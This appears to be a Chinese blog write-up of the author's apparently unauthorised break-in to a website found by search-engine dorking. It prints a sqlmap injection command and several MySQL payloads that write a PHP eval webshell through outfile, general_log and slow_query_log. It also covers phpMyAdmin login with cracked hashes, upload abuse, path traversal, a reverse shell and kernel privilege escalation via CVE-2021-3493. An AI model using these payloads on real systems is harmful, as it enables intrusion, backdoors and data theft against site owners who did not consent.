崎岖的渗透测试

---

title: 崎岖的渗透测试实战
tags:

• 渗透实战
  abbrlink: 47189
  date: 2022-06-12 21:20:58

---

渗透测试实战

闲来无事，找找站点搞一搞。非常感谢我的大表哥提供的技术帮助和支持。

一波谷歌语法，发现该站点，手工测试，发现可能存在sql注入，抱着试试看的心态，直接丢sqlmap。

因为一直用的windows下的sqlmap2，导致误判dba权限

python2 sqlmap.py -u http://xxxx/PHP/a_content.php?id=61   --random-agent  --tamper=space2hash.py --threads 5 --batch

旧版本sqlmap

kali下的sqlmap

mysql写入webshell

顺便学习加复习一下，方便自己以后食用

1. 通过outfile写入shell

   select '<?php @eval($_POST[1]);?>' into outfile '网站的绝对路径/shell.php';
   

2. 将shell写入表中

   将shell插入一个表中
   insert into tables values ('<?php @eval($_POST[1]);?>');
   查询该数据表，将结果导出文件
   select comment from sxss into outfile '网站的绝对路径/shell.php';
   

3. 开启全局日志写入shell

   查看全局日志配置
   show variables like '%general%';
   开启全局配置
   set global general_log = on;
   将日志文件设置成服务器下的木马文件
   set global general_log_file = 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';
   然后执行sql语句，mysql会将我没执行的语句记录到日志文件（上一步修改后的文件）中
   select '<?php @eval($_POST[1]);?>';
   

4. 慢查询日志写入shell（高版本的mysql有默认不让导入导出）

   查看慢查询日志开启情况
   show variables like '%slow_query_log%';
   开启慢查询日志
   set global slow_query_log=1;
   修改日志文件存储的绝对路径
   set global slow_query_log_file='网站的绝对路径/shell.php';
   向日志文件中写入shell
   select '<?php @eval($_POST[1]);?>' or sleep(11);
   

利用条件：

• root权限

• 网站的绝对路径且具有写入权限

信息收集

1.扫描一波web路径，发现存在phpadmin

2.sqlmap一把梭

3.md5解密

数据库getshell尝试

• 登录phpadmin

• 翻一波之前的phpadmin getshell笔记

确认一下网站的绝对路径

1.into outfile导入木马

select @@basedir;

只有/usr/,试试默认路径/var/www/html,无果

select '<?php eval($_POST[cmd]);?>' into outfile 'web路径';

mysql高版本中secure_file_pirv会对读写进行限制

show global variables like '%secure%';

当secure_file_priv为NULL时，表示限制Mysql不允许导入导出。

要想成功，则需要在Mysql文件夹下修改my.ini 文件，在[mysqld]内加入secure_file_priv ="" 即可。

2.利用Mysql日志文件

mysql5.0以上会创建日志文件

1. general_log 指的是日志保存状态，ON代表开启 OFF代表关闭；

2. general_log_file 指的是日志的保存路径。

   查看日志状态：

   show variables like '%general%';
   

   当开启general时，所执行的sql语句都会出现在log文件。

   修改general_log_file的值，执行的sql语句就会对应生成，进而getshell。

   需要注意路径斜杠的方向

   set global general_log = 'on'
   set global general_log_file = 'C:/phpStudy/www/hack.php'
   

   再次执行，getshell

   select '<?php eval($_POST[cmd]);?>'
   

无法访问

前端上传getshell

前端登录，通过sqlmap跑出的用户账号密码登录，发现两处上传，一处头像，一处身份证照片上传

尝试上传漏洞

burp一把梭

经过一波操作尝试，发现图片可以上传成功，但是无法正常访问，和我的大表哥交流得知可能存在路径权限访问限制。

柳暗花明又一村

还得是见多识广的表哥啊！！！！

上传的很多路径都在/PHP/这个路径中，于是做了一下目录递归扫描，发现该站存在路径遍历的问题。

递归一波web路径 ，又学习到了新知识！！！开森

访问一波/PHP/qa/目录

可以正常访问，意外的有上传

webshell

反弹shell，提权

CVE-2021-3493(提权内核漏洞)

自己提权失败，linux提权需要学习一波，先借用表哥的图贴上

webshell的快乐

No One Is Secure Everything Can Be Broken !